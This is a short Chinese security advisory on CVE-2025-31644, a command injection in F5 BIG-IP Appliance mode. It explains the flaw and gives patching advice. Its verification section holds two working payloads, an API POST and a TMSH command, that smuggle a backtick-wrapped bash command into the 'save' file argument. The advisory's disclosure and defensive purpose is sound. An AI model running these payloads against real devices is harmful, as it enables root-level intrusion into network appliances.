F5 BIG-IP 系统漏洞 CVE-2025-31644
受影响版本
F5 BIG-IP v16.1.4.1
漏洞详情
漏洞特征
-
编号: CVE-2025-31644 -
类型: 设备模式下的命令注入漏洞 -
风险: 管理员通过认证后可获得 root 权限远程代码执行
技术原理
在 Appliance 模式下,"save"指令的文件参数(file
)存在未过滤的 Perl 脚本和系统命令调用,攻击者可通过构造特殊字符(如反引号 ```)实现命令注入。该漏洞仅在 BIG-IP 设备启用 Appliance 模式时生效,此模式的安全机制本应阻止高级 shell 命令执行。
漏洞验证
API 接口payload
POST /mgmt/tm/sys/config HTTP/1.1
Host: target_host
Authorization: Basic [base64_credentials]
Content-Type: application/json
{
"command": "save",
"options": [
{
"file": "/var/tmp/`bash${IFS}-c${IFS}'id'|tee${IFS}mal_was_here.scf",
"passphrase": "dummy"
}
]
}
TMSH CLI payload
save sys config file /var/tmp/`bash${IFS}-c${IFS}'id'${IFS}'>&2'.scf no-passphrase
防御建议
-
及时更新官方安全补丁 -
严格控制管理接口访问权限 -
在非必要情况下关闭 Appliance 模式 -
启用多因素认证机制
原文始发于微信公众号(棉花糖网安情报站):F5 BIG-IP rce漏洞 CVE-2025-31644
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论